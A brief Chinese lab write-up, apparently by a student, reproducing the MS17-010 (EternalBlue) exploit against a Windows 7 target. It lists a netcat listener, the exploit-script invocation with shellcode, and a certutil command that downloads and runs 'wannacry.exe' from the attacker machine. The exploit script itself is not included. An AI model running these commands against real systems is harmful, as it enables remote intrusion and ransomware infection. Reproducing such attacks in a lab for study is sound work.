前言
很老的洞了,隻是老師上課講了,我就複現一遍。
開始
環境靶機為
windows7
并且存在此漏洞
攻擊機需要
python3
環境
nc –lvp 8888
python ms17-010.py –-host 192.168.217.2 –-file shellcode
隻需這兩條指令,便可以利用成功,其中
ms17-010.py
是
NSA
洩露出來的腳本
之後我們便可以通過
windows
自帶的工具
certutil.exe -urlcache -split -f http://192.168.217.1/wannacry.exe wannacry.exe
寫入病毒程式并且運作。
腳本不提供
總結
0.0
![python poc1---DVWA檔案上傳[low][圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)